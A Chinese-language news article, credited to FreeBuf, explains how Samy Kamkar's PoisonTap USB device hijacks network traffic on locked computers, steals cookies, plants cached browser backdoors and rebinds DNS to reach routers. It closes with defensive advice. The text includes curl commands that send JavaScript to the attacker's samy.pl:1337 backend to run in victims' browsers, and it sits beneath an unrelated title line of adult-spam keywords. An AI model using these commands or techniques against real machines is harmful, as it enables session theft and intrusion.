压在透明的玻璃上c-国产精品国产一级A片精品免费-国产精品视频网-成人黄网站18秘 免费看|www.tcsft.com

近日，著名硬件黑客Samy Kamkar利用5美元設備打造的黑客工具PoisonTap，只需30秒，就可以攻破設置有任意密碼的電腦系統(tǒng)，并實現(xiàn)長期后門安裝。PoisonTap不是暴力破解密碼，而是繞過密碼。

PoisonTap的標配：5美元的樹莓派微型電腦Raspberry Pi Zero、USB適配器、內(nèi)置免費漏洞利用軟件。

目前，相關軟件和利用工具已在Github提供下載，Raspberry Pi Zero在某寶上也有售賣，感興趣的童鞋可以嘗試打造屬于自己的PoisonTap神器。

以下為PoisonTap官方Github介紹的工作機制，感嘆Samy Kamkar大神天馬行空的思維，同時也深諳自己技藝不精，不足之處，希望大家指正交流。

PoisonTap操作實現(xiàn)：

PoisonTap通吃Windows和Mac系統(tǒng)，一旦插入電腦，將偽裝模擬成新加入的以太網(wǎng)連接，即使受害者使用WIFI，一樣可以使系統(tǒng)優(yōu)先接入其偽裝的虛假網(wǎng)絡。PoisonTap利用中間人攻擊方式，可以劫持監(jiān)聽受害者所有網(wǎng)絡流量，竊取存儲在瀏覽器里的任意cookie和session，然后發(fā)送給控制端。以下為PoisonTap具體操作實現(xiàn)：

通過 USB或Thunderbolt模擬成新加入的以太網(wǎng)連接設備；

劫持目標系統(tǒng)所有網(wǎng)絡連接流量（即使是低優(yōu)先級或未知的網(wǎng)絡連接）

竊取存儲在瀏覽器內(nèi)相關Alexa排名前100萬網(wǎng)站cookie和session信息

識別目標網(wǎng)絡路由信息，通過遠程outbound方式進行WebSocket或DNS重綁定攻擊

通過HTTP的JS緩存中毒方式實現(xiàn)長期web后門安裝控制，這些緩存后門涉及上千個域名和通用javascript CDN 鏈接

使用用戶cookie對后端域名實現(xiàn)遠程HTTP GET或POST方式控制連接

不需要系統(tǒng)解鎖

移除攻擊載體后，后門保持有效

PoisonTap可以繞過或突破以下安全保護措施：

• 鎖屏密碼
• 路由表優(yōu)先級設置和網(wǎng)絡接口服務順序
• 同源保護策略
• Cookie的HttpOnly安全設置
• Cookie的SameSite安全屬性
• 雙因素或多因素認證
• DNS Pinning
• 跨域資源共享
• HTTPS cookie 保護

PoisonTap如何工作：

PoisonTap對系統(tǒng)和網(wǎng)絡安全信任機制的攻擊，將會產(chǎn)生一系列連鎖反應，利用USB/Thunderbolt、DHCP、DNS和HTTP方式，可以進行信息竊取、網(wǎng)絡入侵和后門安裝。

網(wǎng)絡劫持

1 攻擊者向有密碼保護并且鎖屏的電腦系統(tǒng)插入PoisonTap；

2 PoisonTap將會模擬偽裝成一個新加入系統(tǒng)的網(wǎng)絡連接，默認情況下，即使在有密碼保護的鎖屏狀態(tài)下，Windows、OS X 和Linux系統(tǒng)將會識別該虛假網(wǎng)絡連接，并發(fā)出DHCP請求；

3 PoisonTap響應DHCP請求，并提供一組經(jīng)過構造，從0.0.0.0至255.255.255.255，與PoisonTap設備為同一子網(wǎng)的隨機IP地址組合； 通常，在系統(tǒng)使用現(xiàn)有網(wǎng)絡連接的情況下，一個附加網(wǎng)絡連接的加入，系統(tǒng)會把其默認為低優(yōu)先級網(wǎng)絡，并繼續(xù)使用現(xiàn)有網(wǎng)絡網(wǎng)關。

但是，在基于”Internet traffic”的?“LANtraffic”情況下，任何路由表/網(wǎng)關優(yōu)先級/網(wǎng)絡接口服務順序設置都可被繞過。

PoisonTap通過更改原網(wǎng)絡連接網(wǎng)關地址，把流量引入自身，進而劫持系統(tǒng)所有網(wǎng)絡流量。

Cookie竊取

只要目標系統(tǒng)運行有瀏覽器，打開網(wǎng)頁將會通過AJAX或動態(tài)腳本框架（script/iframes）產(chǎn)生各種請求，而由于系統(tǒng)網(wǎng)絡流量被完全劫持，

1 PoisonTap將會監(jiān)聽到所有HTTP請求和響應，并將這些內(nèi)容發(fā)送到PoisonTap的web服務端（Node.js）；即使DNS服務器指向其它內(nèi)部IP，由于這些內(nèi)部DNS服務器將為緩存的域名產(chǎn)生公共IP地址，而這些IP地址已經(jīng)被PoisonTap劫持，所以攻擊仍然有效

3 當Node web服務器接收到請求時，PoisonTap會通過HTML或Javascript進行響應（許多網(wǎng)站會在后臺請求中加載HTML或JS）

4 然后，HTML / JS-agnostic頁面會生成許多隱藏的iframe，每個iframe中又包括Alexa排名前100萬內(nèi)的不同網(wǎng)站

通過web后門進行遠程訪問

1當PoisonTap生成上千個iframe之后，將會迫使瀏覽器加載每個iframe，但這些iframe不僅僅是空白頁面，而是無限緩存的HTML + Javascript后門

2 即使用戶當前未登錄，由于PoisonTap已經(jīng)在每個緩存域名上強制綁定了這些后門，使攻擊者能夠使用Cookie并在將來啟動同源請求

例如，當加載http://nfl.com/PoisonTapiframe時，PoisonTap接受轉(zhuǎn)向的Internet流量，并通過Node Web服務器響應HTTP請求

添加了其它HTTP頭以無限緩存頁面

3 實際響應頁面是HTML和Javascript的組合，并由此產(chǎn)生持續(xù)有效的WebSocket連接攻擊者web服務器端（通過互聯(lián)網(wǎng)而不是PoisonTap設備）

WebSocket保持開放狀態(tài)，允許攻擊者在將來任何時候回連后端機器，并在任何有后門部署的源上執(zhí)行請求（Alexa排名前100萬個網(wǎng)站-見下文）

如果后門在一個站點（如nfl.com）上打開，但用戶希望攻擊不同的域名（如pinterest.com），攻擊者可以將nfl.com上的iframe加載到pinterest.com后門中（http://pinterest.com/PoisonTap）

同樣，域上的任何“X-Frame-Options”、跨域資源共享和同源策略安全性完全被繞過，因為實際請求的是PoisonTap留下的緩存，而不是真正的域名

內(nèi)部路由器后門和遠程訪問

• 1 PoisonTap可以劫持當前網(wǎng)絡的實際局域網(wǎng)子網(wǎng)
• 2 PoisonTap通過在一個特定主機上強制緩存后門，具體來說，在目標路由器的IP后面加上“.ip.samy.pl”，如192.168.0.1.ip.samy.pl，就可以生成一個持久的DNS重綁定攻擊

當使用PoisonTap作為DNS服務器（受害者使用公共DNS服務器）時，PoisonTap使用臨時專門的IP（1.0.0.1）進行響應，這意味著此時任何請求都將訪問到PoisonTap Web服務器

如果DNS服務器設置為內(nèi)部網(wǎng)絡（如192.168.0.x），1.0.0.1.pin.ip.samy.pl發(fā)出一個經(jīng)過構造的請求，幾秒之后，它將會向我的專用DNS服務器（公網(wǎng)的）返回任意[ip.address].ip.samy.pl中的IP地址信息

然后，PoisonTap將會在http://192.168.0.1.ip.samy.pl/PoisonTap上快速設置一個后門，而在PoisonTap設備上將指向1.0.0.1，該后門將實現(xiàn)從PoisonTap設備訪問

• 3 DNSpinning 和DNSrebinding的安全性設置，由于之前做出Alexa?top100萬網(wǎng)站請求而耗盡DNS pinning表，最終將被繞過。之后，DNS就不需要重新綁定，使得該攻擊可以持續(xù)很長時間
• 4 現(xiàn)在，后門強制連接到http://192.168.0.1.ip.samy.pl/PoisonTap，任何對192.168.0.1.ip.samy.pl的請求都將訪問到unpinned的IP地址，導致路由器解析直接指向192.168.0.1
• 5 這意味著如果通過后門遠程在iframe中加載192.168.0.1.ip.samy.pl/PoisonTap指向主機，就可以對內(nèi)部路由器執(zhí)行AJAX GET/POST和其它任意頁面，實現(xiàn)完全控制內(nèi)部路由器

構造請求與DNS服務器解析的對應關系

[ip.addy].ip.samy.pl normally responds with [ip.addy]

192.168.0.1.ip.samy.pl -> 192.168.0.1 (A record)

[ip.addy].pin.ip.samy.pl temporarily (~5 seconds) points *.ip.samy.pl to [ip.addy]

1.0.0.1.pin.ip.samy.pl -> 1.0.0.1

192.168.0.1.ip.samy.pl -> 1.0.0.1 (A record, short TTL)

基于web遠程訪問的其它后門

1?PoisonTap替代了成千上萬常見的，基于CDN的Javascript文件，如Google和jQuery CDNs。如果一個網(wǎng)站或域名加載了受感染中毒的CDN Javascript文件，正確的代碼配合后門，就可以讓攻擊者實現(xiàn)入侵訪問

2?由于每個緩存的網(wǎng)站域名都留有后門，即使當前受害者沒有對任何域名執(zhí)行訪問,攻擊者仍然可以遠程強制后端瀏覽器執(zhí)行同源請求（AJAX GET / POST）

3?當受害者訪問基于HTTP或CDN Javascript緩存中毒的網(wǎng)站時，后門就被觸發(fā)

PosionTap安全防范

服務器安全

1 僅使用HTTPS，至少對認證和認證內(nèi)容使用HTTPS

2確保啟用Cookie安全標記，防止HTTPS Cookie信息泄露

3 當調(diào)用遠程Javascript腳本資源時，請使用子資源完整性(SRI)標記屬性

4 使用HSTS防止HTTPS降級攻擊

桌面客戶端安全

1 有必要可以用粘合劑封住USB和Thunderbolt端口

2 每次離開電腦時關閉瀏覽器

3 禁用USB和Thunderbolt端口

4 經(jīng)常清理瀏覽器的緩存數(shù)據(jù)

5 在不使用電腦時，讓電腦進入休眠狀態(tài)而不是睡眠狀態(tài)，在休眠狀態(tài)中，電腦中所有的進程都將停止工作，安全性更高

文件介紹：

backdoor.html：每當一個http://hostname/PoisonTapURL請求發(fā)生并竊取 cookie信息時，該文件作為返回的強制緩存內(nèi)容，它包含一個后門并生成一個外連至samy.pl:1337（主機/端口可更改）的websocket，等待服務器命令。

backend_server.js：這是你在Internet可訪問的Node服務器,也是backdoor.html連接的內(nèi)容（例如，samy.pl:1337）。 該服務器也用來發(fā)送命令，如：

# pop alert to victimcurl 'http://samy.pl:1337/exec?alert("muahahahaha")'# to set a cookie on victimcurl 'http://samy.pl:1337/exec?document.cookie="key=value"'# to force victim to load a url via ajax (note, jQuery is stored inside the backdoor)curl 'http://samy.pl:1337/exec?$.get("http://192.168.0.1.ip.samy.pl/login",function(d)\{console.log(d)\})'

pi_poisontap.js：它通過Raspberry Pi Zero上的Node.js運行，為PoisonTap 的HTTP服務端截獲請求，存儲竊取Cookie并注入緩存后門

pi_startup.sh：在Raspberry Pi Zero上啟動時運行，將設備模擬為USB以太網(wǎng)配件，設置惡意DHCP服務器，允許流量重路由，DNS欺騙，并啟動pi_poisontap.js文件

target_backdoor.js： 此文件預先放在任何與CDN相關的Javascript文件中，通過Google CDN’s jQuery URL方式形成后門

target_injected_xhtmljs.html：在受害者系統(tǒng)中注入HTTP / AJAX請求并形成整個攻擊

poisontap.cookies.log： 記錄來自受害者瀏覽器的cookie

修復措施：

目前來說，PoisonTap因為是多種黑客技巧組合而成的攻擊，整個攻擊和利用過程不能明確反映某個產(chǎn)品或系統(tǒng)漏洞，所以，目前來說，沒有一種明確的修復措施。

但Kamkar提出了一種解決方案，希望在系統(tǒng)層面的網(wǎng)絡連接切換中加入權限許可機制，但是蘋果公司沒有對此作出回應，而微軟公司在給記者的回復郵件中表示，PoisonTap是一種物理接入攻擊。

所以，最好的防御策略就是自己保管好電腦并及時更新系統(tǒng)和軟件。

來源：FreeBuf